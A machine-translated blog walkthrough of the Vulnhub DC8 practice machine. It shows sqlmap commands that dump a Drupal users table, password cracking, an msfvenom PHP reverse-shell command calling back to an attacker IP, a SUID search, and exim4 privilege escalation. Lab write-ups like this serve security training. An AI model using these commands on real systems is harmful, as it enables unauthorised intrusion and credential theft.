当前位置:网站首页>Vulnhub's DC8
Vulnhub's DC8
2022-06-26 21:54:00 【Tianxia (Tianyan Master)】
Dear friends , But look at the master directly
https://blog.csdn.net/weixin_44288604/article/details/122944302
Personal writing is very rough
DC8 Its own difficulty is low , You can easily obtain the target permission , General idea
The host found , Port scanning —— Exploit service vulnerabilities —— Get background permissions —— Upload shell—— Raise the right
The host found , Port scanning , Service detection 

Total open 2 Ports ,80 and 22 port ,80 The services with open ports are drupal 7, Open the interface for detection , Here use burpsuit union xray To test
burpsuit Of user option Set your own idle agent in the operation bar , function xray that will do , As shown in the figure below
Use here bp Test with your own browser , Then click on the interface , Click on each function node
Click to http://192.168.43.142/?nid=3 In this interface ,xray The presence of sql Inject , Go straight up sqlmap
Two databases were found ,d7db,information_schema, Choose the first one here d7db, View table name
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db --tables
Choose from a variety of tables users surface , Direct download
sqlmap -u http://192.168.43.142/?nid=3 --batch -level 4 -D d7db -T users --dump
Two users were found ,admin and john, But the password is the encrypted data , Try brute force cracking , Make these two ciphertexts into a dictionary , Use john To crack violently , Burst out of it john The password for turtle, Log in backstage , View to upload shell The location of , It is recommended to use Google browser , Don't ask , Ask is to be able to right-click translation 
In this interface , You can define the interface after entering the form , Here the msf Generate php The Trojan horse bounced , It has been generated , No display
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=8888 -f raw > shell.php
Open the file , Copy the file to the location shown above , choice PHP code, And save , Then submit the data in recheck format in the corresponding form , You can accept the session
python Interactive shell, Find yes sudo Permission to execute the file
find / -perm -u=s -type f 2>/dev/null
found exim4 by sudo jurisdiction , View version , Find corresponding exp
exp Dafa , Download the second one here , Then copy it to the attacker , Use python Turn on http service , The target machine downloads and runs

get root jurisdiction
边栏推荐
- Operator介绍
- AI intelligent matting tool - hair can be seen
- 会计要素包括哪些内容
- leetcode:152. 乘积最大子数组【考虑两个维度的dp】
- leetcode:141. 环形链表【哈希表 + 快慢指针】
- Web crawler 2: crawl the user ID and home page address of Netease cloud music reviews
- Talk about my remote work experience | community essay solicitation
- YOLOv6:又快又准的目標檢測框架開源啦
- 俞敏洪:新东方并不存在倒下再翻身,摧毁又雄起的逆转
- 如何在 SAP BTP 平台上启用 HANA Cloud 服务
猜你喜欢

花店橱窗布置【动态规划】

Web crawler 2: crawl the user ID and home page address of Netease cloud music reviews

Android IO, a first-line Internet manufacturer, is a collection of real questions for senior Android interviews

Configure redis master-slave and sentinel sentinel in the centos7 environment (solve the problem that the sentinel does not switch when the master hangs up in the ECS)

360手机助手首家接入APP签名服务系统 助力隐私安全分发

【数学建模】基于matlab GUI随机节点的生成树【含Matlab源码 1919期】

CVPR 2022 - Interpretation of selected papers of meituan technical team

Yolov6: the fast and accurate target detection framework is open source
![leetcode:141. Circular linked list [hash table + speed pointer]](/img/19/f918f2cff9f831d4bbc411fe1b9776.png)
leetcode:141. Circular linked list [hash table + speed pointer]

DLA模型(分类模型+改进版分割模型) + 可变形卷积
随机推荐
亿级月活全民K歌Feed业务在腾讯云MongoDB中的应用及优化实践
股票炒股注册开户有没有什么风险?安全吗?
Introduction to operator
SAP commerce cloud project Spartacus getting started
十大券商注册开户有没有什么风险?安全吗?
Hands on deep learning pytorch version 3 - Data Preprocessing
fastadmin极光推送发送消息的时候registration_id多个用逗号分割后无效
在哪家券商公司开户最方便最安全可靠
关于appium踩坑 :Encountered internal error running command: Error: Cannot verify the signature of (已解决)
Leetcode(122)——买卖股票的最佳时机 II
QT based "synthetic watermelon" game
How to analyze financial expenses
矩阵求导及其链式法则
同花顺注册开户有没有什么风险?安全吗?
AI智能抠图工具--头发丝都可见
curl: (35) LibreSSL SSL_connect: SSL_ERROR_SYSCALL in connection
SAP Commerce Cloud 项目 Spartacus 入门
龙芯中科科创板上市:市值357亿 成国产CPU第一股
Is there any risk for flush to register and open an account? Is it safe?
leetcode:141. 环形链表【哈希表 + 快慢指针】